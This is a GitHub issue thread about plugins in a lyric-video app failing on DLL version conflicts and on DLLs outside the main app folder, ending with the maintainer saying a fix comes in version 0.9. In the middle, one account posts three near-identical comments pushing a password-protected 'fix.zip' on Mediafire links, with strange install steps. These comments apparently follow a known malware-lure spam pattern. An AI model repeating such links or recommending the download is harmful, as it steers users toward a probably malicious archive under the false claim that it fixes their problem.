### ISSUE TITLE
Plugins do not work with dll version conflicts or dll's not in main app

### ISSUE THREAD

**Issue by mpulukkinen** [Lyric-Video-Studio/PluginInterface#1]
If plugin uses different versio of same ddl than the main app, plugin or the main app may load wrong version of that dll. Also, in order for any dll to work, it must be in main app folder, otherwise plugin load fails. 

This prevents 3rd party plugin makers to use nugets etc. 

However, I'm not 100% sure if it's a bug or feature :) Since having it this way, 3rd party plugins might be more secure, since they do not support loading whatever dll's...

All general MAUI & net8 libraries work, so there might not be reason for allowing more dll's to be loaded. 

Also related, it would be nive if plugins would load all dll's from the folder they are installed and nowhere else, that would make the plugins more resistant to changes in main app (but would not benefit from version updates of main app)

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mpulukkinen** [comment]
Fix implemented, will be released with 0.9
